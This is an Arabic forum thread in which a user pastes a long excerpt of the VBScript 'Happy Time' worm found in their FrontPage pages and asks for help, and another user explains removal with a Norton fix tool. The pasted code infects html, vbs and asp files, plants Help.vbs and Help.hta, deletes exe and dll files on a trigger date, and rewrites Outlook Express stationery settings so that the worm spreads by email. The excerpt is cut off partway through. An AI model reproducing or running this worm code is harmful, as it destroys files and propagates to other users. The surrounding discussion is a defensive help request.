-
السلام عليكم...
وش رايكم في هذا الفيروس !!؟؟
script language="VBScript"
Rem I am sorry! happy time
On Error Resume Next
mload
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Os.Write()
Ihtml = ""
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "Help.vbs") Then
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)
main
Else
Os.Reset()
Os.Path = mPath & "\" & "Help.hta"
Os.Doc = Lhtml()
Os.write()
Iv mPath, "Help.hta"
End If
End If
End If
Else
main
End If
End Sub
Sub main()
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER\Software\"
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:\help.htm") Then
Of.DeleteFile ("C:\help.htm")
End If
Key = CInt(Month(Date) + Day(Date))
If Key = 13 Then
Od.RemoveAll
Od.Add "exe", "0001"
Od.Add "dll", "0001"
End If
Cn = Rg(Ks & "Help\Count")
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help\Count", Cn + 1
f1 = Rg(Ks & "Help\FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help\FileName", f2
If IsDel(fext) Then
f3 = f2
f2 = FNext(Of, Od, f2)
Rw Ks & "Help\FileName", f2
Of.DeleteFile f3
Else
If LCase(WScript.ScriptFullname) <> LCase(f2) Then
Fw Of, f2, fext
End If
End If
If (CInt(Cn) Mod 366) = 0 Then
If (CInt(Second(Time)) Mod 2) = 0 Then
Tsend
Else
adds = Og
Msend (adds)
End If
End If
wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
If wp = "" Then
n1 = ""
n3 = Cs & "\Help.htm"
Else
mP = Of.GetFile(wp).ParentFolder
n1 = Of.GetFileName(wp)
n2 = Of.GetBaseName(wp)
n3 = Cs & "\" & n2 & ".htm"
End If
Set pfc = Of.CreateTextFile(n3, True)
mt = Sa("1100")
pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt
pfc.Close
Rw Ks & "Help\wallPaper", n3
Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
End If
Else
Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True)
fc.Write Sa("0100")
fc.Close
bf = Cs & "\Untitled.htm"
Set fc2 = Of.CreateTextFile(bf, True)
fc2.Write Lhtml
fc2.Close
oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail"
MSH = oe & "\Message Send HTML"
CUS = oe & "\Compose Use Stationery"
SN = oe & "\Stationery Name"
Rw MSH, 1
Rw CUS, 1
Rw SN, bf
Web = Cs & "\WEB"
Set gf = Of.GetFolder(Web).Files
Od.Add "htt", "1100"
For Each m In gf
fext = GetExt(Of, Od, m)
If fext <> ""
End If
End Function
/script
لو تلاحظون مدري كان هذا أسمه
Rem I am sorry! happy time
على فكره تراي مختصره طويل مره
وهو ما يطلع لي إلا في برنامج الفرونت بيج أي صفحة أصممها ما ددري وش هو السبب وممكن أنكم تشوفون موقعي في الفيروس ولا لا
بس لاتخافون ما روع
http://www.zeeen.com
ولو تذكرون لي أفضل يرامج الكشف عن الفيروسات مع التحديث
ومشكورين مقدما
أمل أن أجد الجواب
-
هلا هلا بلزين :>
شوف هذا فيروس مزعج معمول بلغه VBScript
الاصابه عن طريق الايمل او عن طريق صفحه بلغه asp
وانا بصراحه جنني بس لقيت دواه ملف صغير من موقع نورتن
اسحب الملف ثم سوي اعاد لتشغيل الكميوتر وادخل على وضع لامان
شغل ملف وضغط اوكي وهو بنضفلك جهازك من هذا لفيروس وهو فيروس يعدل بكثير من الملفات اغلبها ملفات html افتح اي ملف تلقى بأخر خمسة سطور الكود حق لفيروس
عموما لملف لي بتسحبه من موقع نورتن هذا مؤقت بس لاكن لو رحت واتصفحت بصفحة مصابة راح يرجعلك الفيروس لذلك اخي لكريم من الافضل تركيب نسخه كامله وحديثة من برنامج نورتن انتي فيورس2002
وخلي الابديت اسبوعين ولله بصراحه برنامج رهيب انصحك فيه
اي موقع مشبوه ومفيرس على طول بلوك عليه
وفي موقع دخلته حق النديم اضاهر مسوي كود بالصفحة يسرق فيها ارقام الاي سيس كيو بس قبل منت ادري بس مع النورتن كفشه وسوى بلوك لذلك انصحك بهذا لبرنامج معليش طولت عليك ونسسيت احط الينك
تفضل وادعيلي ولاتنسى تنظف موقعك من الفيروس لازم ترسل صفحاتك من جديد
http://www.symantec.com/avcenter/ven...ptime.fix.html
وعلى فكرة موقعك اضاهر موقف من االهوست مطلع شيء طلع لشركة المستضيفه
تحياتي لك وحياه سعيده بدون فيروسسات 
-
جزاك الله خير سا الساحل والله يكثر من أمثالك وأبشرك فرمته .!!
ضوابط المشاركة
- لا تستطيع إضافة مواضيع جديدة
- لا تستطيع الرد على المواضيع
- لا تستطيع إرفاق ملفات
- لا تستطيع تعديل مشاركاتك
-
قوانين المنتدى
أضف موقعك هنا |
اضافة محتوى فريد لموقعك